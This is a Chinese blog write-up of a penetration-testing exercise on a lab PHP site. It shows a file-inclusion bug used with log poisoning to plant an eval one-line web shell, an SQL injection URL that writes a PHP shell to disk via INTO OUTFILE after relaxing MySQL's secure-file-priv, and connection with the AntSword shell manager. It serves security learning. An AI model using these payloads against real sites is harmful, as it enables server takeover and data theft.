记一次网站渗透测试学习

admin 2023年7月24日12:06:16评论26 views字数 666阅读2分13秒阅读模式

准备环境:phpstudy 网站源码
记得小p的php版本最好是5.3

记一次网站渗透测试学习


看一下几个常见位置有没有漏洞
文件包含漏洞
漏洞位置前台index.php
典型的文件包含漏洞,没有校验传入的文件,使攻击者可以调用任意文件

记一次网站渗透测试学习


1.将访问include.php页面的URL链接www.xionghai.com/include复制到burp的repeater发送请求

记一次网站渗透测试学习


2.在请求行中将文件路径改为一句话木马<?php @eval($_REQUEST['cmd']);?>

记一次网站渗透测试学习


3.打开Apache错误日志发现新增的错误信息已经被写入

记一次网站渗透测试学习


4.打开中国蚁剑连接即可

记一次网站渗透测试学习

漏洞位置
后台admin文件夹下index.php同样存在

记一次网站渗透测试学习


Sql注入漏洞
位置:login.php

记一次网站渗透测试学习


后台报错注入
位置:/admin/files/editcolumn.php

记一次网站渗透测试学习


复现

  1. 修改secure-file-priv参数的值


    记一次网站渗透测试学习



    现在secure-file-priv参数的值为null
    在my.ini中添加



记一次网站渗透测试学习

重启mysql发现值变为空

记一次网站渗透测试学习

记一次网站渗透测试学习

写入webshell

记一次网站渗透测试学习


http://www.xionghai.com/admin/?r=editcolumn&type=1&id=1,"?php@eval($_POST['attack']);?"intooutfile'C:phpstudy_proWWWwww.xionghai.comshell.php'#
查看服务器上传成功

记一次网站渗透测试学习

3.中国蚁剑连接shell

记一次网站渗透测试学习

来源:https://xz.aliyun.com/  感谢【1651984332523292 

原文始发于微信公众号(衡阳信安):记一次网站渗透测试学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月24日12:06:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次网站渗透测试学习http://cn-sec.com/archives/1900259.html

发表评论

匿名网友 填写信息